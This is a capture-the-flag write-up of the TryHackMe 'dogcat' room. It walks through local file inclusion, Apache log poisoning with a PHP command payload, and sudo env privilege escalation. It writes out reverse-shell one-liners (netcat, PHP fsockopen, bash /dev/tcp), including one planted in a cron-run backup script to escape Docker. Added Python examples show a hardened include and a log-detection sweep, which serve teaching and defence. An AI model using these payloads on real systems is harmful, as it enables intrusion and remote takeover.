TryHackMe: dogcat
[Enumeration]
Port scan
nmap -Pn <ip>
There are 2 open ports: 22 and 80.

OS and service scan
nmap -A -p 22,80 <ip>

Vulnerability scan
nmap --script vuln -p 22,80 <ip>

Access HTTP Site

View page source

Click cat

Click dog

Scan the site's directories.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
There are 3 interesting files: flag.php, cat.php, and dog.php.

Access all of them.
dog.php

cat.php

flag.php, nothing revealed.

[Exploitation]
Back to the site: the index page seems to include "dog.php" or "cat.php" through the "view" parameter.
Try to view "flag". Failed!!!
Only dogs and cats are allowed.

Try to access “/etc/passwd”. Failed!!!

Try to access "./dog". Works.
It seems I can request anything, as long as the text "dog" appears in the request.

Let's append "/etc/passwd" to the request.
http://<ip>/?view=./dog/../../../../../../../../../../../../../etc/passwd
Still fails. It seems there is more to bypass than the "dog" check.

Using PayloadsAllTheThings
Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
I will use php://filter with base64.

Let’s intercept with Burp Suite

Send to Repeater

Let's view the index page first.
http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../index
Success!!! The response is a base64 string.

Decode it with Burp Suite's Decoder.
Now I have the source code of index.php.

Viewing the source code.
It means the "view" parameter must contain "dog" or "cat", and if the "ext" parameter is not sent it defaults to ".php", which is appended to the included file name. Sending an empty "ext" therefore removes the suffix.

Let's send the request again. This time I will try to read "/etc/passwd" and include an empty "ext" parameter, so nothing is appended to the path.
http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=
Success!!!
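The include logic just recovered, modelled in Python as an added example (not the room's PHP and not code from the original write-up): a vulnerable resolver that reproduces only the two facts stated above (the view must contain "dog" or "cat"; a missing ext defaults to ".php") beside an allow-list version, run over requests mirroring the ones in this write-up. The web root path is an assumption.

```python
"""Vulnerable include resolver, as the recovered source is described, beside a fixed one.

Added example; the room's real index.php is PHP and is not reproduced here. WEB_ROOT is assumed.
"""
import posixpath
from typing import Optional

WEB_ROOT = "/var/www/html"        # assumed location of index.php
ALLOWED_VIEWS = ("dog", "cat")    # the only pages the application means to include


def vulnerable_include_target(view: str, ext: Optional[str] = None) -> str:
    """What include() would receive: a substring check plus a client-controlled suffix."""
    if ext is None:                # parameter absent -> ".php"; present but empty -> no suffix
        ext = ".php"
    if "dog" not in view and "cat" not in view:
        raise PermissionError("Sorry, only dogs or cats are allowed.")
    return view + ext


def hardened_include_target(view: str, ext: Optional[str] = None) -> str:
    """Exact-match allow-list; the client-supplied ext is ignored and the server picks the suffix."""
    if view not in ALLOWED_VIEWS:
        raise PermissionError("unknown view")
    return view + ".php"


def on_disk(target: str) -> str:
    """Where a plain-path include target lands after textual '..' normalization relative to the
    web root (the successful /etc/passwd request above shows the server resolved it this way).
    Stream wrappers such as php://filter are returned unchanged; they bypass the path logic."""
    if "://" in target:
        return target
    return posixpath.normpath(posixpath.join(WEB_ROOT, target))


# Constructed requests mirroring the write-up: (view, ext); None means ext was not sent.
REQUESTS = {
    "legit":             ("dog", None),
    "flag":              ("flag", None),
    "passwd_no_ext":     ("./dog../../../../../../../../etc/passwd", None),
    "passwd_empty_ext":  ("./dog../../../../../../../../etc/passwd", ""),
    "source_via_filter": ("php://filter/convert.base64-encode/resource=./dog../../index", None),
}


def evaluate(resolver):
    """Run every constructed request through a resolver; {name: resolved target or 'blocked'}."""
    out = {}
    for name, (view, ext) in REQUESTS.items():
        try:
            out[name] = on_disk(resolver(view, ext))
        except PermissionError:
            out[name] = "blocked"
    return out


if __name__ == "__main__":
    for label, fn in (("vulnerable", vulnerable_include_target),
                      ("hardened", hardened_include_target)):
        print(label)
        for name, result in evaluate(fn).items():
            print(f"  {name:18} -> {result}")
```

The vulnerable resolver shows why the first traversal attempt failed (".php" lands on the end of /etc/passwd) and why an empty ext fixes it; the hardened resolver blocks everything except the two real pages, regardless of what ext says.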

View the page source: not much useful there.

Next step: log poisoning.
Since I screwed up the log file, I have to terminate the machine and start again. (Whatever gets written into access.log is included on every later request, so one malformed PHP payload ruins the log for good.)
I will use Burp Suite's Repeater to send the request
http://<ip>/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=
Success!!! Now I can read /var/log/apache2/access.log

Let's add a command.
Edit the User-Agent header to be:
<?php system($_GET['cmd']); ?>
Send that request once so the PHP tag is written into access.log, then include the log with an empty "ext" and the command in the "cmd" parameter (ext must stay empty, or the suffix breaks the include):
/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=&cmd=id
Success!!!
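The same tricks seen from the defender's side: an added Python example (not part of the original write-up) that parses Apache combined-format access log lines and flags php:// wrappers, directory traversal, includes of log files, an empty ext parameter and PHP tags in the User-Agent. The log lines are constructed to mirror this write-up's requests; the client address and timestamps are made up.

```python
"""Detection sweep over Apache 'combined' access log lines for the LFI and log-poisoning
patterns used in this write-up. Added example; SAMPLE_LOG is constructed, not a real capture."""
import re
from urllib.parse import unquote

# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

SAMPLE_LOG = """\
10.10.14.7 - - [17/Jul/2020:12:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.7 - - [17/Jul/2020:12:00:09 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./dog../../index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.7 - - [17/Jul/2020:12:00:15 +0000] "GET /?view=./dog../../../../../../../../etc/passwd&ext= HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
10.10.14.7 - - [17/Jul/2020:12:00:22 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
10.10.14.7 - - [17/Jul/2020:12:00:30 +0000] "GET /?view=./dog../../../../../../../../var/log/apache2/access.log&ext=&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.10.14.7 - - [17/Jul/2020:12:00:41 +0000] "GET /?view=cat%2F..%2F..%2Fetc%2Fpasswd&ext= HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
"""

# Each rule sees the URL-decoded request line and User-Agent.
RULES = {
    "php_wrapper":      lambda req, ua: "php://" in req.lower(),
    "traversal":        lambda req, ua: "../" in req or "..\\" in req,
    "log_file_include": lambda req, ua: "/var/log/" in req,
    "empty_ext":        lambda req, ua: re.search(r"[?&]ext=(?:&|\s|$)", req) is not None,
    "php_tag_in_agent": lambda req, ua: "<?php" in ua.lower() or "<?=" in ua,
}


def decode(value: str) -> str:
    """Two decoding passes so single- and double-encoded payloads both surface."""
    return unquote(unquote(value))


def scan(log_text: str) -> list:
    """Return one finding per suspicious line: {'line', 'host', 'rules', 'request'}."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            findings.append({"line": lineno, "host": None, "rules": ["unparsable"], "request": line})
            continue
        req, ua = decode(m["request"]), decode(m["agent"])
        hits = [name for name, rule in RULES.items() if rule(req, ua)]
        if hits:
            findings.append({"line": lineno, "host": m["host"], "rules": hits, "request": m["request"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']:>3} {f['host']} {', '.join(f['rules'])}")
```

A User-Agent hit on its own is the important one: once that line is in the log, every later include of access.log executes it, so the detection has to fire on the poisoning request, not only on the request that triggers the payload.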

Let's get a reverse shell.
Create a listener
nc -lvp 1234

Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
URL-encode the command with Burp Suite and place it in the "cmd" parameter.
I tried this command first:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Copy to the request and send. Failed!!!

Since the site runs PHP, this time I will use a PHP one-liner.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Copy to the request and send.

Back to the listener: now I have a shell.

[Privilege escalation]
Let’s explore the machine.
pwd
ls
cat flag.php
Now I have the first flag.

cd ..
ls
There's flag2 in "/var/www".

cat flag2_QMW7JvaY2LvK.txt

Let's explore the user directories
cd /home
ls
ls -la
Nothing

Let's verify if I can use the sudo command.
I can run "env" with sudo.

Root command reference: https://gtfobins.github.io/gtfobins/env/#sudo
sudo env /bin/sh
id
Now I’m root.

cd /root
ls
cat flag3.txt
Now I have flag3.

Let's explore the machine further to find the last flag.
cd /tmp
ls
Nothing

cd /opt
ls -la
There's a backups directory

cd backups
ls -la

This "backup.sh" is interesting.
cat backup.sh
It looks like this machine is running inside a Docker container.

Let's break out of it.
Start another listener
nc -lvp 1235

Replace the original script in backup.sh with a reverse shell (<ip> is the attacker's address; note that the original backup command is lost):
echo "#!/bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1235 0>&1'" >> backup.sh

Back to the listener and wait a while for backup.sh to be run again.
Now I have another shell.

ls
There's the fourth flag.

cat flag4.txt
